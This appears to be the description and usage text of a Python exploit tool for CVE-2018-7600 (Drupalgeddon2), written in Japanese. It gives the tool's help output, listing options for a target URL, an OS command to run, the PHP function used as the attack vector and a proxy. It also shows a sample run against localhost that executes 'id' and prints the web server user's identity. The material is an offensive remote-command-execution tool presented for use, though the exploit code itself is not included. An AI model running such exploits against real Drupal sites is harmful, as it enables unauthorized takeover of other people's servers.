
CVE-2018-7600 (Drupalgeddon2) に対する Python エクスプロイト。Forms API でのプロパティインジェクションを介して脆弱な Drupal サイトでリモートコマンド実行を可能にし、内蔵の脆弱性テストとプロキシサポートを備えています。
$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) エクスプロイト by Rafael Caria
使用法: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]
[!] このスクリプトは、Forms API における Drupal のプロパティインジェクション (CVE-2018-7600) を悪用します。脆弱なバージョン: Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, < 8.5.1。
オプション引数:
-h, --help このヘルプメッセージを表示して終了
--url URL, -u URL ターゲットの Drupal サイトの URL (例: http://target.com/)
--command COMMAND, -c COMMAND 実行する OS コマンド
--function FUNCTION, -f FUNCTION 攻撃ベクトルとして使用する関数 (デフォルト = passthru)
--test ターゲットが脆弱かどうかをテスト
--proxy PROXY, -p PROXY プロキシを http://127.0.0.1:8080/ の形式で設定 (デフォルト = なし)
$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) エクスプロイト by Rafael Caria
[+] リクエスト送信先: http://127.0.0.1
[+] テスト中: http://127.0.0.1 が脆弱かどうか
[!] ターゲットは CVE-2018-7600 に対して脆弱です
[+] エクスプロイトを起動して実行: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)